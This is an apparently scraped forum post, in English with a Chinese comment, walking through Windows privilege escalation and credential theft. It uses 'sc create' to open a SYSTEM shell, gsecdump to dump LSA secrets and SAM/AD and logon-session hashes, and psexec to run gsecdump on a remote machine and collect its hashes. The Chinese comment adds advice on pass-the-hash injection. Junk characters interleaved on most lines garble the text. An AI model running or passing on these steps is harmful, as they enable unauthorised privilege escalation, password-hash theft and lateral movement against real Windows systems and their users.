o get a DOS Prompt as NT system:
& o4 h& Z) E( e( m1 o+ f
8 t2 L8 \3 t% B5 x, T& aC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact6 ^3 z! u4 \% x. `" r9 t
[SC] CreateService SUCCESS
& `: V& ~# r' k8 i1 d+ G/ b% i' c/ H* a
C:\>sc start shellcmdline
' v! v* B6 z! N0 C2 b[SC] StartService FAILED 1053:
7 }( Y* s/ L. ?" m' U0 `9 T: x
( J! e5 Y0 q) ~: g! i) f9 q+ U* DThe service did not respond to the start or control request in a timely fashion.
9 _( Z# a+ C) y9 K3 {( U' d6 o. ~
- \6 a1 m1 h2 q" ~* @C:\>sc delete shellcmdline
7 D P$ k' j. T7 |5 Y[SC] DeleteService SUCCESS
: Z X2 J+ Q: U7 x. b' P
; p* Z# o+ p' C: ]+ s------------
5 D) z& [6 d8 P; d$ C
6 g, d0 Y) x+ yThen in the new DOS window:/ U) a# f; B& P6 F
5 U" V* r; O% i* |7 |$ T7 ^Microsoft Windows XP [Version 5.1.2600]8 d: `0 O( U: }) d
(C) Copyright 1985-2001 Microsoft Corp.
) G! j3 [* Q7 H5 ^9 w% B9 C, V# J. S$ x$ G( }* p1 R9 M4 X; c
C:\WINDOWS\system32>whoami
% @" ?, B7 E4 N; |NT AUTHORITY\SYSTEM
3 v0 E. ?% e0 d- G1 p* r6 ?) K- k I0 x( @9 q- R( |
C:\WINDOWS\system32>gsecdump -h
# L- u& @0 t& u- u; cgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)/ F8 K& R e6 c& p# v" H% W
usage: gsecdump [options]
" p. X8 @# m$ k1 l# w* c3 ]1 Q4 o
4 N& E, P' ? P" [options:, L4 M. F- z& L \+ t4 i8 h' N
-h [ --help ] show help- P4 u; }6 Y. V* v+ h
-a [ --dump_all ] dump all secrets
* |4 t+ t- D" s; A6 U+ H, m) r# @-l [ --dump_lsa ] dump lsa secrets# {1 y7 E. j$ f ?; R4 d" n4 N: I4 \
-w [ --dump_wireless ] dump microsoft wireless connections
" t5 s6 d% k* b+ \& t-u [ --dump_usedhashes ] dump hashes from active logon sessions
7 a/ v4 h5 v- z6 O: \( \-s [ --dump_hashes ] dump hashes from SAM/AD
g9 w9 v! l0 o2 j& } V& p8 r6 `5 ?! p8 V" b& {
Although I like to use:( ]3 v) \, S! v4 {+ R
5 z9 O, u- ]1 u- g
PsExec v1.83 - Execute processes remotely/ O) ^, }! ?. _! }! M
Copyright (C) 2001-2007 Mark Russinovich
G' s' d5 ~: A8 o# NSysinternals - 链接标记[url]www.sysinternals.com[/url]* u1 ?5 v2 R& }1 y; b v2 q
- d2 X3 ]0 {7 ^9 X7 }: n6 p
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
7 q4 P* q7 J/ B; S% s) d
4 o6 S' n9 h; _: N ]# ^5 ]to get the hashes from active logon sessions of a remote system.
# r6 ~8 U. `" }: N3 U8 e0 ?0 f# W! U- Q# k& {
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.: v/ y+ M- O: }1 c0 L, k1 m
( K+ m0 n" D) L5 l, k( c% @
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
3 v; l% e* b6 o$ Z* T& _原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url] a$ R& R# |" q7 m! m) t3 o* c1 ~
7 x6 w) v- H* v. l9 V
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
- r: P: o, v; G |